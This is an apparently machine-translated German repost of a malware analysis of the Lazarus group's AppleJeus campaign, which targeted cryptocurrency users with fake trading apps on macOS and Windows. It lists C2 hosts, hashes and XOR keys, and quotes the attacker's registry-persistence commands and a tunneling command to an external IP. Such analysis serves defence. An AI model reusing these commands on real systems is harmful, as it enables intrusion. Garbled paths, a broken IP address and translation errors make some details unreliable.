Heim > Betrieb und Instandhaltung > Sicherheit > So führen Sie eine AppleJeus-Aktionsanalyse durch

So führen Sie eine AppleJeus-Aktionsanalyse durch

PHPz
Freigeben: 2023-05-13 13:58:13
nach vorne
3030 Leute haben es durchsucht

Die Lazarus-Organisation ist derzeit eine der aktivsten APT-Organisationen. Im Jahr 2018 entdeckte Kaspersky eine von dieser Organisation gestartete Angriffskampagne namens AppleJeus. Dieser Vorgang ist der erste Angriff von Lazarus auf macOS-Benutzer. Um macOS-Benutzer anzugreifen, hat Lazarus einen Authentifizierungsmechanismus hinzugefügt, der die Nutzlast der nächsten Stufe sehr sorgfältig herunterladen kann. Um Windows-Benutzer anzugreifen, entwickelten sie einen mehrstufigen Infektionsprozess. Nach der Veröffentlichung der „AppleJeus“-Operationsanalyse wurde Lazarus bei der Durchführung von Angriffen vorsichtiger und wandte mehr Methoden an, um einer Entdeckung zu entgehen.

AppleJeus Follow-up

Nach der Veröffentlichung der Analyse der Operation AppleJeus nutzte Lazarus weiterhin ähnliche Vorgehensweisen, um Kryptowährungsgeschäfte zu stören, und Forscher entdeckten in AppleJeus weitere Malware, die der macOS-Malware ähnelt. Diese macOS-Malware verwendet öffentlichen Code, um ihr Installationsprogramm zu entwickeln. Die Malware verwendet den von Centrabit entwickelten QtBitcoinTrader.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Diese drei macOS-Installationsprogramme verwenden ähnliche Post-Installer-Skripte, um Nutzlasten zu löschen, und verwenden dieselben Befehle, wenn sie die abgerufenen Nutzlasten der zweiten Stufe ausführen. Darüber hinaus wurde auch eine andere Art von macOS-Malware MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d) identifiziert. Diese Malware wurde am 12.03.2019 erstellt, die Netzwerkkommunikation war jedoch nicht verschlüsselt. Es wird spekuliert, dass es sich hierbei um eine Zwischenstufe der macOS-Malware-Transformation handelt und upgraden.

Änderungen bei der Windows-Malware

Die fortlaufende Verfolgung dieser Kampagne ergab, dass ein Opfer im März 2019 von der Windows-AppleJeus-Malware angegriffen wurde. Es wurde festgestellt, dass die Infektion mit einer schädlichen Datei namens WFCUpdater.exe begann und die Angreifer eine gefälschte Website nutzten: wfcwallet[.]com.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Die Angreifer nutzten wie zuvor mehrstufige Infektionen, die Methoden haben sich jedoch geändert. Die Infektion beginnt mit .NET-Malware, die als WFC-Wallet-Updater getarnt ist (a9e960948fdac81579d3b752e49aceda). Diese .NET-Datei prüft nach der Ausführung, ob der Befehlszeilenparameter „/Embedding“ lautet. Die Malware ist für die Entschlüsselung der WFC.cfg-Datei im selben Ordner mithilfe eines hartcodierten 20-Byte-XOR-Schlüssels (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62) verantwortlich. Stellen Sie dann eine Verbindung zum C2-Server her:

wfcwallet.com (aufgelöste IP: 108.174.195.134)

www.chainfun365.com (aufgelöste IP: 23.254.217.53)

führt dann den Befehl des Angreifers aus und installiert die nächste Stufe Nutzlast. Der Angreifer legt zwei Dateien im Systemordner des Opfers ab: rasext.dll und msctfp.dat. Sie verwenden den Windows-Dienst RasMan (Remote Access Connection Manager), um die Nutzlast der nächsten Stufe zu registrieren. Nach der grundlegenden Aufklärung hat der Angreifer die Nutzlast manuell mit dem folgenden Befehl platziert:

cmd.exe /c dir rasext.dll

cmd.exe /c dir msctfp.dat

cmd.exe /c tasklist /svc findstr RasMan

cmd.exe /c reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesRasManThirdParty /v DllName /d rasext.dll /f

Um den Remote-Tunnel einzurichten, verwendete der Angreifer Befehlszeilenparameter, um weitere verwandte Tools zu implantieren, die Forscher erhielten diese jedoch nicht Weitere Tooldateien.

Portöffner:

%APPDATA%LenovodevicecenterDevice.exe 6378

Tunneling-Tool:

%APPDATA%LenovodevicecenterCenterUpdater.exe 127.0.0.1 6378 104.168.167.16. 44 3

macOS-Malware-Änderungen

JMTTrading

A Bei der Verfolgung dieser Kampagne wurde eine macOS-Malware-Variante entdeckt. Die Angreifer nennen ihre gefälschte Website und App JMTTrading, und andere Forscher und Sicherheitsanbieter haben umfangreiche technische Details veröffentlicht. Lassen Sie mich hervorheben, was an diesem Angriff anders ist.

Angreifer nutzen GitHub, um ihre Schadanwendungen zu hosten.

Der Malware-Autor verwendete in seiner macOS-Malware Objective-C anstelle des QT-Frameworks.

Die Malware implementiert eine einfache Backdoor-Funktionalität innerhalb der ausführbaren macOS-Datei.

Ähnlich wie im vorherigen Fall verwendet Malware einen 16-Byte-XOR-Schlüssel zur Ver-/Entschlüsselung.

Die Windows-Version der Malware verwendet ADVobfuscator, um ihren Code zu verbergen.

Das macOS-Malware-Installationsskript unterscheidet sich erheblich von früheren Versionen.

UnionCryptoTrader

hat außerdem einen weiteren Angriff auf macOS identifiziert. Das Schadprogramm heißt UnionCryptoTrader und der Sicherheitsforscher dineshdina04 hat einen identischen Fall entdeckt. Der Angriff lässt sich wie folgt zusammenfassen:

Das Installationsskript ist das gleiche wie das von JMTTrading verwendete.

Der Malware-Autor hat diese macOS-Malware mit SWIFT entwickelt.

Der Malware-Autor hat die Methode zum Sammeln von Informationen geändert.

Die Malware beginnt mit der Authentifizierung mithilfe der Parameter auth_signature und auth_timestamp, um die Nutzlast der zweiten Stufe bereitzustellen.

Die Malware erfordert keinen Datenträgerabbruch, um die Nutzdaten der nächsten Stufe zu laden.

Windows-Version von UnionCryptoTrader

Forscher haben die Windows-Version von UnionCryptoTrader gefunden (0f03ec3487578cef2398b5b732631fec). Es wird vom Telegram Messenger heruntergeladen und ausgeführt:

C:Users[Benutzername]DownloadsTelegram DesktopUnionCryptoTraderSetup.exe

Auch auf gefälschter Website gefunden Nachdem das Telegram des Angreifers entdeckt wurde, ist es höchst bestätigt, dass der Angreifer den Telegram Messenger verwendet hat, um das Installationsprogramm zu versenden. Da die Nutzlast nur im Speicher ausgeführt wird, können nicht alle relevanten Dateien abgerufen werden. Der gesamte Infektionsprozess ist WFCWallet sehr ähnlich, es kommt jedoch der Injektionsprozess hinzu.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Die Windows-Version von UnionCryptoTrader verfügt über das folgende Fenster mit Preisdiagrammen für mehrere Kryptowährungen.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Die Windows-Version des UnionCryptoTrader-Updaters (629b9de3e4b84b4a0aa605a3e9471b31) verfügt über ähnliche Funktionen wie die macOS-Version. Basierend auf dem Build-Pfad (Z:Loaderx64ReleaseWinloaderExe.pdb) bezeichnet der Malware-Autor diese Malware als Loader. Nach dem Start ruft die Malware die grundlegenden Informationen des Opfers ab und sendet sie als HTTP-POST.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Wenn die Antwort vom C2-Server 200 ist, entschlüsselt die Malware die Nutzlast und lädt sie in den Speicher. Abschließend sendet die Schadsoftware act=done. Die von diesem Loader heruntergeladene Nutzlast der nächsten Stufe (e1953fa319cc11c2f003ad0542bca822) ähnelt dem .NET-Downloader von WFCWallet. Die Malware ist dafür verantwortlich, die Datei Adobe.icx im selben Ordner zu entschlüsseln, die nächste Nutzlast in den Internet Explorer-Prozess einzuschleusen und die Befehle des Angreifers auszuführen.

Die endgültige Nutzlast (dd03c6eb62c9bf9adaf831f1d7adcbab) ist die gleiche wie bei WFCWallet und wurde manuell gepflanzt. Malware-Autoren verwenden zuvor gesammelte Informationen, um Malware einzuschleusen, die nur auf bestimmten Systemen funktioniert. Die Malware prüft die Informationen des infizierten Systems und vergleicht sie mit einem vorgegebenen Wert.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Die Windows-Malware lädt eine verschlüsselte msctfp.dat-Datei in den Systemordner und lädt jede Konfiguration. Es führt zusätzliche Befehle basierend auf dem Inhalt der Datei aus. POST-Anfragen mit vordefinierten Headern werden verwendet, wenn die Malware mit dem C2-Server kommuniziert.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Erste Kommunikation Die Malware sendet zunächst Parameter:

cgu: 64-Bit-Hex-Wert aus der Konfiguration #🎜🎜 ##🎜🎜 #aip: MD5-Hashwert in der Konfiguration

sv: hartcodierter Wert

Wenn die Antwort vom C2-Server 200 ist, sendet die Malware eine Nachricht mit verschlüsselten Daten und einem Zufallswert Bei der nächsten POST-Anfrage verwendet der Angreifer den Zufallswert, um jedes Opfer zu identifizieren und die POST-Anfrage zu authentifizieren.

imp: zufällig generierter Wert

dsh: XOR-Wert von imp

hb_tp: XOR-Wert von imp (Schlüssel: 0x67BF32)# 🎜🎜##🎜 🎜#hb_dl: Verschlüsselte Daten, die an den C2-Server gesendet werden.

ct: Fest codierter Wert.

Darüber hinaus ergab eine Untersuchung der Infrastruktur mehrere gefälschte Websites, die noch online sind.

Zusammenfassung So führen Sie eine AppleJeus-Aktionsanalyse durch

AppleJeus-Folgeuntersuchung findet mehrere Opfer verteilt über Im Vereinigten Königreich, Polen, Russland und China waren einige der Opfer mit Kryptowährungsgeschäften verbunden.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Die Angreifer veränderten macOS- und Windows-Malware, fügten Authentifizierungsmechanismen im macOS-Downloader hinzu und änderten das macOS-Entwicklungsframework. Der Infektionsprozess in Windows-Systemen unterscheidet sich von früheren. Die Lazarus-Gruppe wird weiterhin Angriffe aus finanziellen Gründen durchführen.

So führen Sie eine AppleJeus-Aktionsanalyse durch

Das obige ist der detaillierte Inhalt vonSo führen Sie eine AppleJeus-Aktionsanalyse durch. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:yisu.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage